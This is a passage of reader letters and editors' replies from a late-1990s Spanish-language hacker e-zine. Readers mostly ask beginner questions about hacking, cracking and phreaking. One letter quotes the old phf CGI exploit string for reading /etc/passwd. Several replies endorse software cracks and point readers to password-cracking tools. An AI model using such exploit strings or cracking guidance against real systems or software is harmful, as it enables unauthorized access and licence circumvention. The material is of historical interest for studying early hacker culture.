  6857.   informar sobre el mundo hack a la gente que mas o menos no controla mucho el 
  6858.   tema. 
  6859.   El motivo del presente mensaje no es mßs que el que me orientΘis acerca de 
  6860.   una duda enorme que tengo y que gente que estudia informßtica que conozco no 
  6861.   logra ponerse de acuerdo. 
  6862.   En primer lugar decir que me interesarφa enormemente tener instalado el 
  6863.   sistema operativo LINUX en mi ordenador a la vez que el sistema operativo 
  6864.   WINDOWS 98, pero claro a la hora de decidirme y estar a punto de empezar a 
  6865.   instalar ambos, es cuando me surge una interrogante sobre problemas que 
  6866.   tendrΘ ya que mi cd-rom no es interno sino que al ser un portßtil por la 
  6867.   cosa de que me saliera mßs barato y aprovechar mas el hardware para el 
  6868.   futuro decidφ hace tiempo comprar un cd-rom (de tipo interno), que se 
  6869.   conectara al puerto paralelo por medio de una caja adaptadora especial. 
  6870.   Pero antes de nada paso a daros las caracterφsticas mßs destacadas de mi 
  6871.   ordenador: 
  6872.  
  6873.   TIPO: NOTEBOOK (portßtil) 
  6874.   MARCA: ACER EXTENSA 355 MMX 
  6875.   PROCESADOR: 133 MMX 
  6876.   RAM: 48 Mg. 
  6877.   DISCO DURO: 1,6 Gb. 
  6878.   DISKETERA: 3,5 
  6879.   CD-ROM: marca SAMSUNG 32X de instalaci≤n interna pero conectado (EN EL 
  6880.   EXTERIOR) en el puerto paralelo por medio de una caja adaptadora especial 
  6881.   con fuente de alimentaci≤n propia 
  6882.   MODEM: TARJETA PCMCIA a 33.6 baudios 
  6883.   ADAPTADOR DE PANTALLA: CHIPS &TECNOLOGIES 65550 PCI 
  6884.   TARJETA DE SONIDO: CONTROLADOR YAMAHA OPL3-Sax WDM 
  6885.   MOUSE: LOGITECH por puerto serie 
  6886.   Bien, dadas las caracterφsticas, paso a expresaros mis dudas principales... 
  6887.  
  6888.   (1) Tendre problemas al instalar LINUX sin tener drivers para cd-rom por 
  6889.   puerto paralelo que LINUX reconozca. 
  6890.   Si existen, donde puedo conseguirlos?. 
  6891.  
  6892.   (2) Cual de los sistemas operativos LINUX es el mas potente en relacion a 
  6893.   controlar sistemas de seguridad, o tiene mas futuro? GRACIAS... 
  6894.  
  6895.   P.D.: Agradeceria me contestaseis a mi en persona y despues si quereis 
  6896.   incluis mi consulta en vuestros e-zines. 
  6897.  
  6898.   Atentamente: delaosapavon@xxxxxxxxxxxxxx 
  6899.  
  6900.   <------>
  6901.  
  6902.   [ Pues no deberias tener problemas de ningun tipo, en caso de tener que
  6903.     usar drivers especificos pasate por el website del fabricante, donde
  6904.     seguramente podras conseguir drivers. 
  6905.     Sobre Linux, lo mejor seria que probases tu mismo las diferentes
  6906.     variantes, pero si quieres una bastante buena pillate el FreeBSD. ]
  6907.  
  6908. <────────────────────────────────────────────────────────────────────────────>
  6909.  
  6910.   Date: Sat, 19 Sep 1998 20:21:57 GMT
  6911.   From: <tuliom@xxxxxxxxxxxxxx>
  6912.   To: "JJF HACKERS TEAM"
  6913.   Subject: Un pedazo 
  6914.  
  6915.   Team,
  6916.  
  6917.   Me dirijo nos mas, que para pedirles si me pueden obsequiar una 
  6918.   parte en su revista. 
  6919.   mi deseo es escribir un articulo donde se hable y explique el lenguaje 
  6920.   binario  y hexadecimal. 
  6921.   Pues me he dado cuenta de que ustedes lo tratan y conozco personas que leen 
  6922.   el e-zine que no lo manejan. 
  6923.   Es solo una pequeña pero concreta explicacion. 
  6924.   Solo que de ustedes, mas si necesitan algun apoyo solo pidanmelo, que
  6925.   por aqui hay unos cuantos hackers pero no se atreven salir. 
  6926.  
  6927.   ah los felicito por el curso de hacking es el mejor praxis que he podido 
  6928.   ver en lo que al tema refiere. 
  6929.  
  6930.   e. 
  6931.  
  6932.   <------>
  6933.  
  6934.   [ Pues enviamos ese articulo y te lo ponemos gustosos en el ezine :)
  6935.     Thx por la felicitacion. Leer FAQ. ]
  6936.  
  6937. <────────────────────────────────────────────────────────────────────────────>
  6938.  
  6939.   Date: Sat, 19 Sep 1998 13:54:58 GMT
  6940.   From: "LordByte" <amestoy@xxxxxxxxxxxxxx>
  6941.   Subject: Posible fallo en el Doawnload del volumen I (Zip) 
  6942.  
  6943.   Pues nada colegas, no se si sera mi descompresorá o no. Pero el volumen uno
  6944.   con todos los E-Zines no se puede descomprimir por fallo del archivo y creo
  6945.   que habiendolo bajado tres veces y comprobado es suficiente. O lo teneis
  6946.   mal, o soy mas torpe que un cisne con botas.
  6947.   Bueno pues por mi parte nada mas, enhorabuena por vuestro trabajo y
  6948.   adelante.
  6949.  
  6950.   ááááááááááááááááááááááááá áááááá LordByteDeKyler -:-*]
  6951.  
  6952.   <------>
  6953.  
  6954.   [ Tu descompresor no funciona bien o tu no... porque el zip funciona 100%,
  6955.     verificado por nuestros tecnicos ;-) ]
  6956.  
  6957. <────────────────────────────────────────────────────────────────────────────>
  6958.  
  6959.   Date: Tue, 15 Sep 1998 09:26:07 GMT
  6960.   From: <tuliom@xxxxxxxxxxxxxx>
  6961.   To: "JJF HACKERS TEAM"
  6962.   Subject: Notificacion 
  6963.  
  6964.   Team,
  6965.  
  6966.   El e-mail es para avisar esto, ustedes se procupan por su web y no parace
  6967.   molestarle este tipo de mensaje, como ,estoy de acuerdo les informo. 
  6968.  
  6969.   Tengan cuidado el pimer Crak de su pagina la baje y no funciono, 
  6970.   estoy utilizando un pentium 166 mhz Winzip 95 y Explorer 4.01 sp1. 
  6971.  
  6972.   Y Praker, hize click en programa para hacer llamadas gratuitas y me dijo 
  6973.   algo en ingles como: el servidor no contesta o no se pudo establecer
  6974.   conexion o error de sintaxis del servidor remoto. 
  6975.  
  6976.   Bien asi que mejoren esto team que ustedes son unicos. 
  6977.   los mejores por favor no decaigan........... 
  6978.  
  6979.   Estamos dentro 
  6980.  
  6981.   Vikingo Hacker 
  6982.  
  6983.   <------>
  6984.  
  6985.   [ No todo siempre funciona y mas cuando son crack's o programas de phreak. ]
  6986.  
  6987. <────────────────────────────────────────────────────────────────────────────>
  6988.  
  6989.   Date: Sat, 12 Sep 1998 04:34:52 GMT
  6990.   From: 444525@xxxxxxxxxxxxxx
  6991.   To: jjf_team@usa.net 
  6992.  
  6993.   holas escribia para ver si os interesaba ke escribiera un artikulo sobre 
  6994.   OTP. 
  6995.   es otro sistema de hacer login en un ordenador de manera ke el passwd 
  6996.   sea distinto kada vez ke entras,de manera ke aun snifando el pass 
  6997.   no te serviria de nada. 
  6998.   seria un artikulo de simple informacion,no de komo hackearlo. 
  6999.   La verda es ke aun no lo he visto en ningun sistema pero bueno. 
  7000.  
  7001.   <------>
  7002.  
  7003.   [ Pues claro, envianoslo y lo pondremos cuanto antes. Leer FAQ. ]
  7004.  
  7005. <────────────────────────────────────────────────────────────────────────────>
  7006.   
  7007.   Date: Mon, 07 Sep 1998 19:31:27 GMT 
  7008.   From: David <dtarro@xxxxxxxxxxxxxx>     
  7009.   To: jjf_team@usa.net 
  7010.   Subject: hola 
  7011.   
  7012.   HOLA SOY UN CHICO ESPAñOL DE 15 AñOS, ME GUSTARIA QUE ME ENSEñARAIS TODO LO 
  7013.   QUE SABEIS SOBRE EL HACKING, SE PROGRAMAR MUCHO EN BASIC, CUALQUIER BASIC, 
  7014.   SE UN POCO DE C, C++, TENGO EL LINUX, NO ME IMPORTA ESTUDIAR CONTESTARME OK? 
  7015.   E OK? 
  7016.  
  7017.   <------>
  7018.  
  7019.   [ Pues lo dicho 1001 veces, lee nuestro ezine y todo lo que pase por tus
  7020.     manos. ]
  7021.  
  7022. <────────────────────────────────────────────────────────────────────────────>
  7023.  
  7024.   Date: Mon, 07 Sep 1998 18:58:18 GMT 
  7025.   From: "Francesco Kywocs" <kywocs@xxxxxxxxxxxxxx>     
  7026.   To: jjf_team@usa.net 
  7027.   Subject: Aclaraciones... : - ) 
  7028.   
  7029.   Hola a todos los del JJF-TEAM, 
  7030.   bueno, yo soy una persona que esta entrando recien en el tema. 
  7031.   Y el grupo de ustedes fue el que mas me gusto, y me baje la E-ZINE de 
  7032.   JJf-TEAM, pero tengo tres problemas: 
  7033.   Primero, siempre hablan de UNIX, para ser necesario para hackear y como 
  7034.   no lo tengo queria saber alguna informacion del tipo, la empresa que la 
  7035.   vende, cual es la mejor version y cosas por estilo. 
  7036.   Segundo, en la E-ZINE n3 publicaron un log famoso que se uso para el 
  7037.   hackeo de un server. Mis dudas son, que es un log B-( , y que significan 
  7038.   esas cinco o seis paginas llenas de palabras, que intento entender sin 
  7039.   solucion. 
  7040.   Y mi tercer problemas es que muchas veces dan codigos de fuente que aun 
  7041.   no entiendo si estan escritos en c o otra cosa, como el que sale en el 
  7042.   "Curso de hacker 2" en la E-ZINE n2. 
  7043.   bueno ya dejo de molestarlos y muchas gracias. 
  7044.   Espero vuestra respuesta para yo tambien aprender. 
  7045.   ~~>C H A O<~~ 
  7046.   Mi E-Mail es: kywocs@xxxxxxxxxxxxxx 
  7047.   Se despide KyWoCs... 
  7048.  
  7049.   <------>
  7050.  
  7051.   [ El Unix no es necesario para ser un Hacker, leer el articulo de Tasslehoff
  7052.     para salir de dudas. Un log es un fichero en el cual se guardan los
  7053.     distintos sucesos que sucende en el ordenador. Ese log simplemente revela
  7054.     la entrada de un Hacker a un sistema informatico y que hizo dentro de el,
  7055.     o sea los comandos que ejecuto. Sobre el Codigo fuente normalmente se
  7056.     suele poner que tipo de lenguaje es. ]
  7057.  
  7058. <────────────────────────────────────────────────────────────────────────────>
  7059.   
  7060.   From: Nain <nii97068@xxxxxxxxxxxxxx>     
  7061.   To: jjf_team@usa.net 
  7062.   Subject: pregunta 
  7063.  
  7064.   hola,
  7065.   acabo de descubrir vuestra revista y me la quiero bajar... todos los n's 
  7066.   para leerla tranquilamente, sin embargo tengo un problema, siempre que 
  7067.   intento bajarmela, nunca esta completa... siempre las frases estan cortadas 
  7068.   por la mitad. que puedo hacer para solucionar esto? 
  7069.   Os ruego me respondais rapidamente porque tengo muchas ganas de terminar de 
  7070.   leerla. 
  7071.  
  7072.   Un saludo.udo. 
  7073.  
  7074.   <------>
  7075.  
  7076.   [ Pasate por nuestro FTP. ]
  7077.  
  7078. <────────────────────────────────────────────────────────────────────────────>
  7079.  
  7080.   From: "esteban" <esteban@xxxxxxxxxxxxxx>     
  7081.   Subject: preguntas 
  7082.  
  7083.   hola me llamo sebastian, deseo hacerte unas preguntas:
  7084.              
  7085.   me he propuesto hackear mi primer web el ultimo dia de este año (1998),
  7086.   quisiera  que me indiques los pasos para conseguirlo, asi como textos que
  7087.   me ayuden a conseguirlo, en espa±ol, ademas trabajo con el windows 98,
  7088.   segun tengo entendido esto no es muy util, ahora como puedo cambiarme a
  7089.   unix, con que libro puedo aprender a usarlo?, que es un cracker y un
  7090.   phreak?, como hackear desde windows 98?, que libro me recomiendas para
  7091.   aprender a programar en c?, que necesito para llegar a ser un hacker?,
  7092.   como puedo llegar a ser un hacker?.
  7093.              
  7094.   por ultimo te felicito por la revista es muy interesante
  7095.              
  7096.   gracias.
  7097.  
  7098.   <------>
  7099.  
  7100.   [ Pues suerte y enviamos tus resultados para el ezine :)
  7101.     Sobre libros pasate por una buena libreria y decide por ti mismo. ]
  7102.  
  7103. <────────────────────────────────────────────────────────────────────────────>
  7104.  
  7105.   Date: Sun, 18 Oct 1998 01:55:08 GMT 
  7106.   From: Jorge <jlimy@xxxxxxxxxxxxxx>    
  7107.   To: conde_vampiro@usa.net 
  7108.   Subject: Hackers 
  7109.   
  7110.   Por favor me decis que es una llave PGP?? Muchas gracias, y como 
  7111.   puedo recuperar el password de mi Bios? 
  7112.  
  7113.   Muchas Gracias. 
  7114.   Jorge Irrazabal 
  7115.   Por Favor respondeme a jlimy@xxxxxxxxxxxxxx 
  7116.  
  7117.   <------>
  7118.  
  7119.   [ PGP (Pretty God Privacy) es un sistema de encriptacion. Para recuperar
  7120.     el password de la BIOS pasate por nuestra seccion de CRACK en la cual
  7121.     encontaras varias utlidades para ello. ]
  7122.  
  7123. <────────────────────────────────────────────────────────────────────────────>
  7124.  
  7125.   From: "Eduardo" <h82867@xxxxxxxxxxxxxx>     
  7126.   Subject: Consulta 
  7127.   
  7128.   Hola soy Eduardo de Murcia, y me gustaria hacerte una pregunta. Espero
  7129.   que no sea mucha molestia. 
  7130.  
  7131.   La pregunta es:
  7132.  
  7133.   Si yo me instalo un programa de esos que dan comprando una revista que
  7134.   son de esos que tienes 30 dias para probarlos y luego ya no van, una vez
  7135.   que se han pasado los 30 dφas que se puede hacer para que siga
  7136.   funcionando? yo lo que hago es darle al reloj del ordenador para atrßs y
  7137.   asi funciona, pero eso es un coñazo y se que hay personas que borrando
  7138.   unas cosas del regedit ya no hace falta hacer eso del reloj y querria saber
  7139.   si tu podrφas decirme que es lo que hay que borrar del regedit para
  7140.   hacerlo, o si hay alguna otra manera para que esos programas funcionen. 
  7141.  
  7142.   Muchas gracias por todo 
  7143.  
  7144.   Un saludo.
  7145.  
  7146.   <------>
  7147.  
  7148.   [ Pues lo de debes hacer es usar un crack siempre y cuando no obtengas
  7149.     beneficios economicos por el uso de ese software. ]
  7150.  
  7151. <────────────────────────────────────────────────────────────────────────────>
  7152.  
  7153.   Date: Sun, 11 Oct 1998 18:35:23 GMT 
  7154.   From: "Mr. Aztech" <mr_aztech@xxxxxxxxxxxxxx>     
  7155.   To: "conde_vampiro@usa.net" 
  7156.   Subject: Solicitamos su ayuda 
  7157.   
  7158.   Muy buenos dias tengo mi estimado conde vampiro, por medio 
  7159.   de la presente lo invito para que se presente a declarar a 
  7160.   la suprema corte de justicia.............. 
  7161.  
  7162.   No te creas, perdon por la broma, te escribo o le escribo 
  7163.   este mail, para solicitarle su ayuda, lo que pasa es que 
  7164.   nos juntamos aproximadamente 13 personas para hacer un 
  7165.   articulo sobre iniciacion en hacking, pero este no es uno 
  7166.   mas sino que esta hecho por gente nueva en esto, llegamos a 
  7167.   la solucion de que solo asi podriamos satisfacer las dudas 
  7168.   de la gente, de newbees a newbees, me entiendes, por lo que 
  7169.   me diriji a usted, por ser conocido en el medio, se que 
  7170.   normalmente dira, no damos cursos particulares, pero no 
  7171.   sera ni un curso ni sera para mi, sera para la elaboracion 
  7172.   de un exelente serie de articulo que posiblemente lleguen 
  7173.   hasta su zine, por lo que hay le van algunas de nuestras 
  7174.   dudas: 
  7175.   1.-Como hace generalmente alguien del medio para 
  7176.   introducuirse a una comp. bueno se que suena muy genral, y 
  7177.   diras, primero estudia basic, pero ya lo se, a lo que me 
  7178.   refiero es:Primero, consigo informacion sierto? Que 
  7179.   informacion? Luego investigo sus vulnerabilidades? Cuales 
  7180.   son las mas comunes? 
  7181.   Aparte de busgs y exploits e ing? Que otra forma hay de 
  7182.   colarse? 
  7183.   Esperamos sus respuestas 
  7184.   Atte.Aztech 
  7185.  
  7186.   <------>
  7187.  
  7188.   [ Pues me suena a clase privada y de eso no damos :) Para aprender sobre el
  7189.     tema leer este ezine :) ]
  7190.  
  7191. <────────────────────────────────────────────────────────────────────────────>
  7192.  
  7193.   Date: Thu, 08 Oct 1998 15:33:24 GMT 
  7194.   From: DrDoom <drdoom@xxxxxxxxxxxxxx>     
  7195.   To: conde_vampiro@usa.net 
  7196.   Subject: Saludos de Satan On-Line 
  7197.   
  7198.   Saludos de Satan On-Line y bienvenidos a RC5. 
  7199.   Nosotros ya llevamos un tiempo en esto. Pero cuantos mßs mejor. 
  7200.   http://rc5stats.distributed.net/tmsummary.idc?TM=3085085 
  7201.  
  7202.   <------>
  7203.  
  7204.   [ Por supuesto cuantos mas mejor, pero nosotros preferimos el JJF RC5 Crack
  7205.     Team :) ]
  7206.  
  7207. <────────────────────────────────────────────────────────────────────────────>
  7208.  
  7209.   From: Cyborg <cyborg@xxxxxxxxxxxxxx>     
  7210.   To: conde_vampiro@usa.net 
  7211.   
  7212.   hola, cada vez que intento bajarme el numero 6 de vuestra revista se me 
  7213.   queda a medias no se porque. Os agradeceria que lo comprimierais en zip 
  7214.   (aunque siempre decis que no quereis para que lo pueda leer todo el 
  7215.   mundo y todo eso) o si podeis enviadmelo por email. 
  7216.  
  7217.   gracias :) 
  7218.  
  7219.   <------>
  7220.  
  7221.   [ Pasate por nuestro FTP. ]
  7222.  
  7223. <────────────────────────────────────────────────────────────────────────────>
  7224.   
  7225.   Date: Tue, 06 Oct 1998 09:47:56 GMT 
  7226.   From: "Dr. J0nY" <jony_1@xxxxxxxxxxxxxx>     
  7227.   To: conde_vampiro@usa.net 
  7228.   Subject: JJF RC5 Crack Team 
  7229.   
  7230.   Hi! 
  7231.  
  7232.   Te he envio el mail a ti ya que pareces ser el cabecilla :) 
  7233.  
  7234.   He intentado seguir las instrucciones que davais de los pasos que habia 
  7235.   de seguir. Pero donde pone: 
  7236.   4. Al dia siguiente chequea tu estatus y edita tu informacion personal 
  7237.   en http://www.distributed.net/ 
  7238.  
  7239.   5. En tu informacion personal, afiliate al ID:7281. El grupo de J.J.F. / 
  7240.   HACKERS TEAM 
  7241.  
  7242.   No se que kereis decir ya ke he mirado en distributed.net i no sale nada 
  7243.   de editar tu informacion personal. 
  7244.  
  7245.   GraxiaS 
  7246.  
  7247.   P.D. Contestame, ok? (tb estoy interesado en H/P/V/C) 
  7248.  
  7249.   <------>
  7250.  
  7251.   [ Pues es realmente facil, vuelvetelo a leerte de como se hace otra vez. ]
  7252.  
  7253. <────────────────────────────────────────────────────────────────────────────>
  7254.  
  7255.   Date: Wed, 07 Oct 1998 07:48:51 GMT 
  7256.   From: "Dr. J0nY" <jony_1@xxxxxxxxxxxxxx>     
  7257.   To: conde_vampiro@usa.net 
  7258.  
  7259.   H! 
  7260.  
  7261.   Conde 
  7262.  
  7263.   Te he envie un mail ayer pidiendo ayuda sobre el RC5-64 y... 
  7264.  
  7265.   Edit Participant Information 
  7266.   Password is incorrect 
  7267.   CPSR distributed.net Electronic Frontier Foundation EPIC Free Software 
  7268.   Foundation Project Gutenberg Software in the Public Interest 
  7269.  
  7270.   segui tus instrucciones pero no me carbura... :( 
  7271.   Espero ke me ayudes 
  7272.   Nos vemos 
  7273.  
  7274.   Spl00t 
  7275.  
  7276.   <------>
  7277.  
  7278.   [ Claro, el password lo recibes via mail que te envia distributed.net y
  7279.     despues pones tu password en tu web personal. ]
  7280.  
  7281. <────────────────────────────────────────────────────────────────────────────>
  7282.  
  7283.   Date: Wed, 07 Oct 1998 08:36:14 GMT 
  7284.   From: "Dr. J0nY" <jony_1@xxxxxxxxxxxxxx>     
  7285.   To: conde_vampiro@usa.net 
  7286.   Subject: Pardon 
  7287.   
  7288.   h! 
  7289.  
  7290.   Perdoname al final lo he conseguido ya ke me hecho un lio de mails xD 
  7291.   Me gustaria conseguir mas info sobre el grupo y luego si me pudieses 
  7292.   comentar algo de H/P/V/C 
  7293.  
  7294.   P.D. CONTESTA 
  7295.  
  7296.   Bye Conde Vampiro 
  7297.  
  7298.   Spl00t 
  7299.  
  7300.   <------>
  7301.  
  7302.   [ Okis :) Bienvenido a JJF RC5 Crack Team. Que grupo, - J.J.F. / Hackers
  7303.     Team - o el JJF RC5 Crack Team, ya que son cosas diferentes? ]
  7304.  
  7305. <────────────────────────────────────────────────────────────────────────────>
  7306.  
  7307.   Date: Tue, 06 Oct 1998 09:09:36 GMT 
  7308.   From: "shelton sol" <librepensador@xxxxxxxxxxxxxx>     
  7309.   To: conde_vampiro@usa.net 
  7310.   Subject: !!
  7311.   
  7312.   WOW! 
  7313.   HE ESTADO LEYENDO TU ARTICULOS Y TU PAGUINA 
  7314.   Y DEJAME DECIRTE QUE HE QUEDADO BOQUIABIERTO 
  7315.   ES EL 1ER LUGAR DONDE NO LES IMPORTA EL ENSEñAR 
  7316.  
  7317.   YO QUIERO APRENDER! 
  7318.   PERO NO HE SABIDO BUSCAR,Y AHORA HE ENCONTRADO 
  7319.   EL LUGAR,PERO TENGO UN PROBLEMA SERIO.NO SE NADA! 
  7320.   CREI QUE EL ASUNTO HACK SERIA MAS SENCILLO 
  7321.   LO UNICO QUE SE ES DEL EL HACK DE ICQ,NUKES ETC 
  7322.   Y MUUUUUY POCO ,NO HE PODIDO GARANTIZAR LA EFECTIVIDAD DE NINGUNO,CREO 
  7323.   QUE ME HA SALIDO DE CASUALIDAD. 
  7324.   EN FIN... 
  7325.   YO QUIERO APRENDER......Y A UD NO LES MOLESTA EL ENSEñAR.....Y NO CREAS 
  7326.   QUE VENGO A QUE ME PONGAN TODO EN BANDEJA DE PLATA...PERO TE REPITO NO 
  7327.   SE NADA DE NADA....LEI EL 1ER ARTICULO DE COMO HACKEAR 
  7328.   EL DE "HACKER TEAM JOURNAL" Y ME HE QUEDADO ATONITO POR LO IMBECIL QUE 
  7329.   SOY..JEJEJEJEJE......PERO PARA CUANDO TE LLEGUE ESTE MAIL CREO LO PODRE 
  7330.   COMPRENDER MEJOR....LO HE IMPRIMIDO PARA ESTARLO LEYENDO. 
  7331.  
  7332.   QUIERO APRENDER! 
  7333.  
  7334.   ...YA NO SE QUE MAS DECIR ...SOLO TENGO UNA PALABRA EN MI CABEZA QUE ME 
  7335.   PERFORA EL CEREBRO 
  7336.  
  7337.   C.U.R.I.O.S.I.D.A.D 
  7338.  
  7339.   EN CASO DE QUE NO ME QUIERAN ENSEñAR...PIDO POR FAVOR CONTESTEN ESTE 
  7340.   MAIL. 
  7341.  
  7342.   NO SE SI UDs. TENGAN ICQ.PERO POR SI TIENEN HE AQUI MI NUMERO XXXXXXXX 
  7343.                                                                 
  7344.   SH 
  7345.  
  7346.   PD. 
  7347.   SOLO INGRESAN A EL JJF HACKER TEAM ,LOS QUE SABEN? 
  7348.  
  7349.   UNA COSA MAS....COMO PUEDO SABER CUANDO ,QUIEN ENTRA A MI PC CON UN 
  7350.   TROJAN? 
  7351.   POR QUE HE INSTALADO UN ANTI TROJAN "TOILET PAPER" 
  7352.   Y MARCA A CADA MOMENTO UNA VIOLACION EN EL MODULO NO SE QUE... 
  7353.  
  7354.   BUENO ME DESPIDO 
  7355.  
  7356.   <------>
  7357.  
  7358.   [ Pues para aprender lee con atencion este ezine. En - J.J.F. / Hackers
  7359.     Team - solo entran personas con cierto conocimiento por varios motivos
  7360.     que no vienen a cuento. Sobre ese detector de troyanos que comentas no
  7361.     lo conozco por eso no se decirte. ]
  7362.  
  7363. <────────────────────────────────────────────────────────────────────────────>
  7364.  
  7365.   De: Desconocido <Pans@xxxxxxxxxxxxxx>
  7366.   A: conde_vampiro@usa.net 
  7367.   Fecha: domingo 4 de octubre de 1998 15:47 
  7368.    
  7369.   oye , necesito que me mandes alguna manera de crackear los logins y 
  7370.   passwords de los servidores , que no sea la de poner el comando 
  7371.   (/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd) a la direecion del 
  7372.   navegador. 
  7373.   Porque nunca funciona y te aseguro que lo he provado con mas de 
  7374.   300 direeciones de internet. 
  7375.    
  7376.   O si tienes algun login y password , para poder telnetear , pasmelo , 
  7377.   estaria muy agradecido. 
  7378.    
  7379.   O si tambiien hubiera un programa que lo crackeara tb. 
  7380.    
  7381.   HAAAAAAAAa , y que ........esto si que no creo. Hacker's Utility v 1.02 , 
  7382.   este programa funciona bajo windows , y es un programa que trae todas las 
  7383.   herramientas para poder hackear , desde finger , hasta crackeadores de
  7384.   passwords , nt , w95 , *.zip , ecta , osea un poco de todo. Gracias Al menos
  7385.   lo he intentado , porque cuando leas este mail , primero , te reiras , luego
  7386.   , te cachondearas , y luego pasaras de responderme con otro mail. Seguro     
  7387.  
  7388.   Pero gracias de todas formas.
  7389.  
  7390.   <------>
  7391.  
  7392.   [ Pues para informacion lee este ezine. Sorry pero no enviamos ningun tipo
  7393.     de informacion de esa clase a los lectores. Para programas crackeadores
  7394.     pasate por nuestra seccion de CRACK. ]
  7395.  
  7396. <────────────────────────────────────────────────────────────────────────────>
  7397.  
  7398.   Date: Sat, 03 Oct 1998 20:58:14 GMT 
  7399.   From: "Raphael da Costa Miranda" <treviland@xxxxxxxxxxxxxx>     
  7400.   To: <"conde_vampiro@usa.net"> 
  7401.     
  7402.   hi, conde vampiro!!!!!!!!! congratulations for this page,  it is very good
  7403.   I don't speak english very well, because Iam from brazilian.
  7404.   please, give a e-mail with craks write in portuguese.
  7405.   and what's the best crak for peolple fall of the net and find a password
  7406.   and the e-mail. I want be a new hacker of this group!!!!!!!!!
  7407.   if you write in portuguese or spanish is better!!!!!!!! 
  7408.  
  7409.   <------>
  7410.  
  7411.   [ Y esto de donde sale?? Nuestro website esta solo en español, por el
  7412.     momento :) Cada dia somos mas Internacionales. ]
  7413.  
  7414. <────────────────────────────────────────────────────────────────────────────>
  7415.  
  7416.   Date: Wed, 30 Sep 1998 10:11:59 GMT 
  7417.   From: "MARIA PILAR " <mapii@xxxxxxxxxxxxxx>     
  7418.   To: conde_vampiro@usa.net 
  7419.   Subject: AYUDA 
  7420.   
  7421.   HOLA 
  7422.  
  7423.   SOY COLOMBIANA 
  7424.  
  7425.   MI PREGUNTA ES LA SIGUIENTE... COMO DESEO U OBTENGO EL IP DE ALGUNA PERSONA. 
  7426.   CUANDO DICHA PERSONA ME MANDA UN MENSAJE YA SEA POR CHAT , ICQ, NETMEETING 
  7427.  
  7428.   LA RAZON ES LA SIGUIENTE ... HAY UNA PERSONA QUE ME BLOQUEA MI COMPUTADOR,
  7429.   ME MANDA MENSAJE OBCENO, ME DICE QYE QUIERE BORRAR MI DISCO DURO....NO SE
  7430.   QUIEN ES... PERO TENGO UN PROGRAMA WINNUKE95 PARA BLOQUERLO PERO NECESITO
  7431.   EL IP DE ESA PERSONA... PERO NO SE OBTENERLO ..ME DICE QUE HAY UN RPOGRAMA
  7432.   QUE MUESTRA EL IP DE LA PERSONA CUANDO LE MANDAN MENSAJE, CORREO, CHAT 
  7433.   AYUDENME... 
  7434.   GRACIAS.... 
  7435.  
  7436.   <------>
  7437.  
  7438.   [ Pues tiene varias opciones si estas usando un programa de chat,
  7439.     simplemente escribe:
  7440.  
  7441.     /dns nick
  7442.  
  7443.    Para ICQ existen programas especificos para ello. ]
  7444.  
  7445. <────────────────────────────────────────────────────────────────────────────>
  7446.  
  7447.   Date: Mon, 28 Sep 1998 11:22:35 GMT 
  7448.   From: "Eduardo" <h82867@xxxxxxxxxxxxxx>     
  7449.   To: <"conde_vampiro@usa.net"> 
  7450.   Subject: consulta 
  7451.  
  7452.   Hola me llamo Eduardo y soy de Murcia. He entrado en vuestra pßgina Web y
  7453.   me ha parecido muy interesante y de las pocas de hackers que me han servido
  7454.   de algo. Yo soy un novato en el mundo de los hackers y tengo mucha
  7455.   informacion que he sacado por ahi pero no me sirve de nada y queria
  7456.   preguntarte unas dudas que tengo para ver si tu me las podrias resolver:
  7457.              
  7458.   1. Si yo sΘ el password de otro, QuΘ tengo que hacer para entrar en su
  7459.      ordenador? o sea donde tengo que poner ese password o que es lo que se
  7460.      hace para acceder a su ordenador.
  7461.              
  7462.   2. Como se puede uno conectar a internet gratis, porque mi madre me va a
  7463.      cortar el cuello ya que las facturas de telefono cada vez bienen mas
  7464.      altas.
  7465.              
  7466.   3. Si uno no tiene Unix no puede hackear?, es que yo tengo como sistema
  7467.      operativo Windows 95.
  7468.             
  7469.   Espero que no sea mucha molestia. Si por lo que sea no puedes contestarme a
  7470.   las preguntas mßndame de todas maneras un mensaje para que yo sepa que has
  7471.   recibido mi mensaje. Mi direccion es: h82867@xxxxxxxxxxxxxx
  7472.              
  7473.   Gracias y hasta otra.
  7474.  
  7475.   <------>
  7476.  
  7477.   [ 1- Primero aprende a manejar Internet y como se conectan a otras
  7478.     computadoras antes de nada :) 2- Eso se llama Phreaking. 3- Si se puede,
  7479.     si se sabe como. ]
  7480.  
  7481. <────────────────────────────────────────────────────────────────────────────>
  7482.  
  7483.   Date: Wed, 23 Sep 1998 19:34:25 GMT 
  7484.   From: j-cool@xxxxxxxxxxxxxx    
  7485.   To: conde_vampiro@usa.net 
  7486.   Subject: ayuda 
  7487.   
  7488.   comunicate conmigo necesito ayuda acerca de v.... 
  7489.   nesecito hacer uno 
  7490.  
  7491.   <------>
  7492.  
  7493.   [ Si quieres algo pues escribe un mail en condiciones pero creo que se por
  7494.     donde van los tiros, o sea que no creo que te ayudemos mucho. ]
  7495.  
  7496. <────────────────────────────────────────────────────────────────────────────>
  7497.  
  7498.   Date: Sun, 20 Sep 1998 16:55:02 GMT 
  7499.   From: JAIRO CASAS <gotich@xxxxxxxxxxxxxx>     
  7500.   To: conde_vampiro@usa.net 
  7501.   Subject: Un aprendiz! 
  7502.  
  7503.   Hola Conde: 
  7504.  
  7505.   Primero que todo quiero felicitarte por la gran labor que esta realizando tu 
  7506.   equipo (suena un poco cursi, no?). Ademas quisiera hacerte un par de
  7507.   preguntas si no es mucha molestia: 
  7508.  
  7509.   1) Que metodo que emplearias para hackear una pagina web que no utilice
  7510.      servidor unix? 
  7511.  
  7512.   2) Cuando hablas de TENER CUIDADO a que peligros te refieres? 
  7513.  
  7514.   3) Para que sirve un dialer/scanner? 
  7515.  
  7516.   4) Como hago para no dejar pistas en un sistema? 
  7517.  
  7518.   J.C. 
  7519.  
  7520.   <------>
  7521.  
  7522.   [ 1- Existen muchas maneras. 2- A que te cojan con las manos en la masa.
  7523.     3- Para descubrir ordenadores conectados al telefono. 4- Pues borrar las
  7524.     huellas, que realmente es casi imposible. ]
  7525.  
  7526. <────────────────────────────────────────────────────────────────────────────>
  7527.  
  7528.   Date: Sun, 13 Sep 1998 19:27:08 GMT 
  7529.   From: scarcamo@xxxxxxxxxxxxxx (Sergio Antonio Carcamo Villegas)    
  7530.   Subject: necesito tu ayuda !!! 
  7531.                
  7532.   hola Conde Vampiro , espero que bien, sabes necesito tu ayuda sobre los
  7533.   hackers , ya que mi intencion es convertirme en uno de uds, pero para
  7534.   propositos en beneficios de los demas, como por ejemplo acabar con la
